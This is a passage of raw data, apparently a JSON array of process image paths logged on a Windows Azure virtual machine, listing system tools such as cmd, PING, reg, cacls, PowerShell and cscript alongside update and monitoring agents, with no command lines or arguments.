System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_20